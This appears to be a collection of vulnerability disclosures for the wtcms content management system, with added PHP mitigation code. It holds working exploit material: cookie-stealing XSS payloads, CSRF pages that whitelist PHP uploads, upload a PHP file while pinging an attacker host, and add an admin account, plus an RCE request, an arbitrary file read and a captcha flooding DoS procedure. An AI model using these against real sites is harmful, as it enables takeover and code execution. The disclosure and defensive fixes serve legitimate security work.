taosir / wtcms
A ThinkPHP-based content management system for quickly building personal blogs, company and school websites, and news sites.
License: GNU Lesser General Public License v3.0
Reflected XSS exists in the administrator's page management section.
In the search box, enter "><a src=" to trigger the XSS.
Combined with the CSRF vulnerability, this can be used to obtain cookies:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
<input type="hidden" name="start_time" value="" />
<input type="hidden" name="end_time" value="" />
<input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
wtcms is based on thinkcmf, and an RCE vulnerability in thinkcmf was disclosed in October (details: https://www.freebuf.com/vuls/218105.html). An attacker can execute any command by requesting ?a=fetch&content=<?php system('ping xxxxxx');?>
To demonstrate this vulnerability, we reproduced it via dnslog.
After sending the request above, we got DNS query records on the dnslog platform.
Besides, we can read any file by sending the request ?a=display&templateFile=README.md; changing the value of templateFile reads any file.
After configuring as required, the site keeps showing "page does not exist".
1. Right-click to view the verification code (captcha) image address.
2. Found width and height parameters in the URL.
3. Use Burp Suite to capture the request and look at the size of the returned response.
4. Try modifying the width and height values and look at the size of the returned response.
5. Through the above test, we know the vulnerability exists. If we send one packet with size 10000 and the server takes 10s to process it, what if we send 10 such packets?
10x10 = 100s
That is, the server takes 100s to process them. Then we send 100 such packets (of course, you should never actually throw 100 packets at it; generally speaking, 20-50 test requests are enough to make the website crash).
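The mitigation for the procedure above is to stop trusting client-supplied image dimensions. This added example (not wtcms code; parameter names and limits are assumptions) validates and clamps the captcha width/height before rendering and flags oversized requests so the flooding pattern is visible in logs:

```php
<?php
// Added example, not part of wtcms: bound the captcha image size server-side.
// The query parameter names (width, height) and the limits are assumptions.
const CAPTCHA_MIN        = 40;
const CAPTCHA_MAX_WIDTH  = 200;
const CAPTCHA_MAX_HEIGHT = 80;

/**
 * Returns [width, height] clamped to the allowed range, or null when the
 * request should be answered with HTTP 400 instead of rendering anything.
 */
function captchaDimensions(array $query): ?array
{
    $opts = ['options' => ['min_range' => CAPTCHA_MIN]];
    $w = filter_var($query['width']  ?? CAPTCHA_MAX_WIDTH,  FILTER_VALIDATE_INT, $opts);
    $h = filter_var($query['height'] ?? CAPTCHA_MAX_HEIGHT, FILTER_VALIDATE_INT, $opts);
    if ($w === false || $h === false) {
        return null;   // non-numeric or below the minimum: reject outright
    }
    // Clamp rather than trust: the pixel budget is what bounds rendering cost,
    // so an oversized value is reduced to the cap instead of being honoured.
    return [min($w, CAPTCHA_MAX_WIDTH), min($h, CAPTCHA_MAX_HEIGHT)];
}

/** True when the raw request asked for more than the cap (worth logging). */
function isOversizedRequest(array $query): bool
{
    return (int)($query['width']  ?? 0) > CAPTCHA_MAX_WIDTH
        || (int)($query['height'] ?? 0) > CAPTCHA_MAX_HEIGHT;
}

// Demonstration with constructed input: the 10000x10000 request from the
// report is clamped to 200x80, and a non-numeric value is rejected.
$flood = ['width' => '10000', 'height' => '10000'];
var_dump(captchaDimensions($flood), isOversizedRequest($flood));
var_dump(captchaDimensions(['width' => 'abc', 'height' => '50']));
```

Repeated oversized requests from one client, as reported by isOversizedRequest(), are the signal to rate-limit or block at the web server.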
Payload: javascript:alert(document.cookie)
Find the published article on the front end and click its link to trigger the XSS.
Payload: javascript:alert(document.cookie)
Find the location on the front end where the XSS code was inserted and click it to trigger the XSS.
Payload: javascript:alert(document.cookie)
Find the link address at the bottom of the front end and click it to trigger the XSS.
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<script type="text/javascript">
function post(url, fields) {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}
function csrf_hack() {
    var fields = "";
    fields += "<input type='hidden' name='image[upload_max_filesize]' value='10240' />";
    fields += "<input type='hidden' name='image[extensions]' value='=jpg,jpeg,png,gif,bmp4,php' />";
    fields += "<input type='hidden' name='video[upload_max_filesize]' value='10240' />";
    fields += "<input type='hidden' name='audio[upload_max_filesize]' value='10240' />";
    fields += "<input type='hidden' name='file[upload_max_filesize]' value='10240' />";
    fields += "<input type='hidden' name='video[extensions]' value='mp4,avi,wmv,rm,rmvb,mkv' />";
    fields += "<input type='hidden' name='audio[extensions]' value='mp3,wma,wav' />";
    fields += "<input type='hidden' name='file[extensions]' value='txt,pdf,doc,docx,xls,xlsx,ppt,pptx,zip,rar' />";
    var url = "http://192.168.1.2/index.php?g=admin&m=setting&a=upload_post";
    post(url, fields);
}
window.onload = function () {
    csrf_hack();
}
</script>
</body>
</html>
```
The above script uses the CSRF to add the php suffix to the whitelist of allowed image upload extensions.
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest() {
    var xhr1 = new XMLHttpRequest();
    xhr1.open('GET', "http://127.0.0.1:5000/?timestamp=" + (new Date()).valueOf(), true);
    xhr1.send(null);
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/192.168.1.2\/index.php?g=asset&m=asset&a=plupload", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------128712298613561");
    xhr.withCredentials = true;
    var body = "-----------------------------128712298613561\r\n" +
        "Content-Disposition: form-data; name=\"name\"\r\n" +
        "\r\n" +
        "abc.php\r\n" +
        "-----------------------------128712298613561\r\n" +
        "Content-Disposition: form-data; name=\"app\"\r\n" +
        "\r\n" +
        "Admin\r\n" +
        "-----------------------------128712298613561\r\n" +
        "Content-Disposition: form-data; name=\"file\"; filename=\"abc.php\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "\x3c?php phpinfo();?\x3e\r\n" +
        "-----------------------------128712298613561--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
window.onload = submitRequest;
</script>
</body>
</html>
```
In the above script, before uploading the PHP file, the trigger timestamp is sent to my host so that I know when the script fired (in preparation for brute-forcing the file name afterwards); then a file whose content is <?php phpinfo(); ?> is uploaded.
After two hours of attack, I received the following good news.
After the administrator logs in, open the CSRF exp page:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?g=admin&m=user&a=add_post" method="POST">
<input type="hidden" name="user_login" value="hacker1" />
<input type="hidden" name="user_pass" value="hacker1" />
<input type="hidden" name="user_email" value="123@qq.com" />
<input type="hidden" name="role_id[]" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Reflected XSS exists in the keyword search of the administrator backend's article management.
URL: http://xxx.xxx.xxx/index.php?g=admin&m=index&a=index
Payload: "><img/src=1 onerror=alert(document.cookie)><a src="
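Both XSS classes reported on this page (the reflected search keyword echoed into an input attribute, and the stored javascript: links on the front end) come down to output handling. This added example, not wtcms code, shows the two fixes; function names are assumptions:

```php
<?php
// Added example, not part of wtcms. Two output contexts, two different fixes.

// HTML attribute context: the search keyword is echoed back into value="...",
// so encode it with quotes included (ENT_QUOTES). A payload such as
// "><img/src=1 onerror=...> then stays inside the attribute as inert text.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// URL context: encoding alone is not enough for href/src, because
// javascript:alert(document.cookie) contains nothing htmlspecialchars changes.
// Allow only an explicit scheme allowlist (or relative paths); anything else
// becomes an inert "#".
function safeHref(string $url): string
{
    $url = trim($url);
    // Browsers ignore control characters inside a scheme ("java\tscript:"),
    // so strip them before looking at it.
    $probe = strtolower(preg_replace('/[\x00-\x20]+/', '', $url));
    if (preg_match('#^([a-z][a-z0-9+.-]*):#', $probe, $m)) {
        if (!in_array($m[1], ['http', 'https', 'mailto'], true)) {
            return '#';
        }
    }
    return $url; // caller still wraps it in e() for the attribute
}

function renderSearchBox(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . e($keyword) . '">';
}

function renderLink(string $href, string $label): string
{
    return '<a href="' . e(safeHref($href)) . '">' . e($label) . '</a>';
}

// Demonstration with the payloads quoted in the reports (constructed input).
echo renderSearchBox('"><img/src=1 onerror=alert(document.cookie)><a src="'), "\n";
echo renderLink('javascript:alert(document.cookie)', 'site link'), "\n";
echo renderLink('https://example.test/page', 'normal link'), "\n";
```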
The backend site settings page has a CSRF vulnerability: an attacker constructs a CSRF payload, and once the administrator clicks the malicious link, the site information is changed automatically.
There is also an XSS in the website statistics code field.
We can write the XSS first and then construct the CSRF code, so that after the webmaster clicks the attacker's malicious link the CSRF executes and the website carries the XSS. As long as the administrator visits the homepage of the website, his cookie can be obtained.
CSRF Exp:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wtcms/index.php?g=admin&m=setting&a=site_post" method="POST">
<input type="hidden" name="options[site_name]" value="test" />
<input type="hidden" name="option_id" value="10" />
<input type="hidden" name="options[site_admin_url_password]" value="" />
<input type="hidden" name="options[site_tpl]" value="default" />
<input type="hidden" name="options[site_adminstyle]" value="flat" />
<input type="hidden" name="options[site_icp]" value="" />
<input type="hidden" name="options[site_admin_email]" value="" />
<input type="hidden" name="options[site_tongji]" value="<script>alert("test")</script>" />
<input type="hidden" name="options[site_copyright]" value="" />
<input type="hidden" name="options[site_seo_title]" value="�¿½�¸�»�¿½�¡�¿½" />
<input type="hidden" name="options[site_seo_keywords]" value="" />
<input type="hidden" name="options[site_seo_description]" value="" />
<input type="hidden" name="options[urlmode]" value="0" />
<input type="hidden" name="options[html_suffix]" value="" />
<input type="hidden" name="options[comment_time_interval]" value="60" />
<input type="hidden" name="cmf_settings[banned_usernames]" value="" />
<input type="hidden" name="cdn_settings[cdn_static_root]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Navigation entries can be added in the admin backend, but the handler has a CSRF vulnerability:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST">
<input type="hidden" name="cid" value="3" />
<input type="hidden" name="parentid" value="72" />
<input type="hidden" name="label" value="CSRF Test" />
<input type="hidden" name="nav" value="on" />
<input type="hidden" name="external_href" value="http://" />
<input type="hidden" name="target" value="" />
<input type="hidden" name="icon" value="" />
<input type="hidden" name="status" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
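Every CSRF exp on this page (upload_post, plupload, user/add_post, site_post, nav/add_post) works because the admin POST handlers accept any request carrying the admin's session cookie. This added example, not wtcms or ThinkCMF code, shows the server-side check such handlers need; helper names and the session key are assumptions:

```php
<?php
// Added example, not part of wtcms: synchronizer token plus Origin check for
// state-changing admin actions. Names (_csrf, csrf_token, X-CSRF-Token) are
// assumptions chosen for illustration.
session_start();

// One random token per session; embed it in every admin form as a hidden
// field, and send it as a header from XMLHttpRequest-based uploaders.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfField(): string
{
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES) . '">';
}

// Call at the top of every POST handler; false means answer with HTTP 403.
// Two independent checks: the token proves the form was rendered by this site
// for this session, and Origin/Referer rejects a cross-site page even if a
// token ever leaks. A missing Origin/Referer is treated as cross-site.
function csrfVerify(array $post, array $headers, string $siteHost): bool
{
    $token = $post['_csrf'] ?? ($headers['X-CSRF-Token'] ?? '');
    if (!is_string($token) || !hash_equals(csrfToken(), $token)) {
        return false;   // hash_equals: constant-time comparison
    }
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? '';
    $host = parse_url($origin, PHP_URL_HOST);
    return $host !== null && strcasecmp($host, $siteHost) === 0;
}

// Demonstration with constructed requests: the auto-submitted form from an
// attacker page carries no token and a foreign Origin, so it is rejected;
// a request built from this site's own form, with its token, passes.
$siteHost = 'localhost';
$forged = ['user_login' => 'hacker1', 'user_pass' => 'hacker1', 'role_id' => ['2']];
var_dump(csrfVerify($forged, ['Origin' => 'http://attacker.example'], $siteHost));
$legit = ['_csrf' => csrfToken(), 'user_login' => 'alice'];
var_dump(csrfVerify($legit, ['Origin' => 'http://localhost'], $siteHost));
```

Setting the session cookie with SameSite=Lax (or Strict) adds a third, browser-enforced layer, but the token check stays because older clients ignore the attribute.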